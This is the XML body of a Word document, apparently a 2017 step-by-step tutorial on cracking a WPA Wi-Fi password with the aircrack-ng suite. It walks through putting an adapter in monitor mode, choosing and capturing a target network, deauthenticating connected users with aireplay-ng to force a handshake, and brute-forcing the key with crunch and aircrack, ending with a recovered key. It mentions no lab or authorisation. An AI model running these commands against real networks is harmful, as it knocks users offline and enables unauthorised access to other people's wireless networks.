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98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6588760" cy="481699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072" cy="48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98" w:rsidRP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>1-Wireless adapter in monitor mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7398" w:rsidRP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ab/>
        <w:t>Airmon-ng start wlan0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398"/>
    <w:p w:rsidR="006A7398" w:rsidRPr="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A7398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6702425" cy="4981903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18" cy="50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98" w:rsidRDefault="006A7398" w:rsidP="006A7398"/>
    <w:p w:rsid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>2-View the wireless around and choose a target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7398" w:rsidRP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>Airodump-ng mon0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7398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6842234" cy="13714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15" cy="14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98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4839375" cy="4629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98" w:rsidRDefault="006A7398" w:rsidP="006A7398"/>
    <w:p w:rsid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>3-start the capture of target choosen with:airodump-ng –bssid F8:….. –c 8 –w zreik mon0.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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsid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>4-deauthentification of user in the reseau with:aireplay-ng -0 20 –a F8:1A… mon0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A7398" w:rsidRPr="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A7398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6668770" cy="334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280" cy="33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98" w:rsidRPr="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398"/>
    <w:p w:rsidR="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398"/>
    <w:p w:rsidR="006A7398" w:rsidRPr="006A7398" w:rsidRDefault="006A7398" w:rsidP="006A7398">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>When a user do</w:t>
      </w:r>
      <w:r w:rsidR="0073635B">
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve"> the authentification we detect when the wpa handshake F8:1A:67:BD:CB:08 appear.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073635B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6763407" cy="4319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503" cy="4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B" w:rsidRPr="0073635B" w:rsidRDefault="0073635B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The capture Automatic saved in home/tc with file named zreik .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073635B" w:rsidRDefault="0073635B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0073635B" w:rsidRDefault="006A7398">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6763385" cy="1497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695" cy="1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B" w:rsidRPr="0073635B" w:rsidRDefault="0073635B" w:rsidP="0073635B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Aircrack attack with some condition if we know some information about the password . crunch min-length max-length caractere | ….</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073635B" w:rsidRDefault="006A7398">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6731876" cy="4634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438" cy="4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B" w:rsidRDefault="0073635B" w:rsidP="0073635B"/>
    <w:p w:rsidR="00F2716C" w:rsidRPr="0073635B" w:rsidRDefault="0073635B" w:rsidP="0073635B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KEY FOUND : 111112233!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F2716C" w:rsidRPr="0073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D9" w:rsidRDefault="00C042D9" w:rsidP="006A7398">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C042D9" w:rsidRDefault="00C042D9" w:rsidP="006A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D9" w:rsidRDefault="00C042D9" w:rsidP="006A7398">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C042D9" w:rsidRDefault="00C042D9" w:rsidP="006A7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98"/>
    <w:rsid w:val="00004FEE"/>
    <w:rsid w:val="006A7398"/>
    <w:rsid w:val="0073635B"/>
    <w:rsid w:val="00BA628D"/>
    <w:rsid w:val="00C042D9"/>
    <w:rsid w:val="00F2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8BC5E-2512-4107-8BFA-E51CB8AB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98"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A7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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-01-18T17:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-18T18:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>